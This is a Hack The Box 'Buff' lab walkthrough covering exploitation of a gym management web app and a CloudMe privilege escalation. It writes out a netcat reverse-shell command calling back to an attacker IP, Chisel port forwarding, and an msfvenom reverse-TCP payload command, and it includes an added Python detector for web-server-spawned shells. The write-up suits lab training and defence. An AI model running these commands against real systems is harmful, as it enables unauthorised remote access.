
Hackthebox Buff walkthrough


Enumeration

Let's begin by scanning with Nmap.


Two ports are open: 8080 and 7680.

HTTP-Page

After opening the web app on port 8080, I found out it's from projectworlds.in.

So I searched for the project:

https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/

I searched for a public exploit for the project and found this exploit.

Exploiting

Python script

Authenticated

We got in!

Let's upload nc.exe.

Uploading

Let's get our reverse shell:

C:\xampp\htdocs\gym\upload> powershell -c ".\nc.exe 10.10.10.10 1234 -e powershell"

Shaun

We got a shell as SHAUN! Let's get the user hash.
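From the defender's side, the reverse-shell step above leaves clear process-creation telemetry. The following is an added example, not part of the original walkthrough: three detection rules run over constructed Sysmon-style events. The field names, the `httpd.exe` parent process, the XAMPP install paths and the sample events are assumptions.

```python
import re

# Field names follow Sysmon Event ID 1 (process creation); events are constructed.
WEB_PARENTS = {"httpd.exe", "php.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
WEBROOT = re.compile(r"\\htdocs\\", re.IGNORECASE)
# netcat-style "-e <shell>" argument, as in the command above
EXEC_SHELL = re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def findings(event):
    """Return the names of the rules this event triggers."""
    hits = []
    if (basename(event["ParentImage"]) in WEB_PARENTS
            and basename(event["Image"]) in SHELLS):
        hits.append("web-server-spawned-shell")
    if WEBROOT.search(event["Image"]):
        hits.append("binary-run-from-webroot")
    if EXEC_SHELL.search(event["CommandLine"]):
        hits.append("shell-bound-to-socket")
    return hits

def triage(events):
    """Keep only events with at least one hit, as (image name, rules)."""
    flagged = []
    for event in events:
        hits = findings(event)
        if hits:
            flagged.append((basename(event["Image"]), hits))
    return flagged

EVENTS = [  # constructed samples, not captured from a real host
    {"ParentImage": r"C:\xampp\apache\bin\httpd.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c powershell -c ".\nc.exe 10.10.10.10 1234 -e powershell"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\xampp\htdocs\gym\upload\nc.exe",
     "CommandLine": r".\nc.exe 10.10.10.10 1234 -e powershell"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\xampp\php\php.exe",
     "CommandLine": r"php.exe -v"},
]

if __name__ == "__main__":
    for name, hits in triage(EVENTS):
        print(name, hits)
```

The benign `php.exe -v` event produces no hits, while the other two events each trigger two independent rules, so a renamed binary or a different parent process still leaves one rule firing.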

USER Flag !

USER

Privilege Escalation

I uploaded WinPEAS.exe, and after running it I found a vulnerable app called Cloudme.exe; it's running on port 8888.

I searched for an exploit and found these:


We need to use port forwarding to run the exploit; you can use Chisel or Plink.

Chisel has to be compiled to an exe to run on Windows; I used Go. You can compile it with this command:

env GOOS=windows GOARCH=amd64 go build -o chisel-x64.exe -ldflags "-s -w"

After compiling it to an exe, let's upload it.

uploading-chisel

I started the server on port 8080 on my machine.

on-your-linux-server

We need to start Chisel on the victim machine so it connects back to the server.

Chisel-on-victim

Exploiting Cloudme

We need to adjust the msfvenom command to get a shell on our machine.

So you need to copy this command and change the IP address to your own to get your shell:

msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python

Exploit

Run your listener on the port you chose in the payload, then run the exploit.

Listener

Got-in

ROOT Flag !

admin-hash

Thanks for Reading 🙏

This post is licensed under CC BY 4.0 by the author.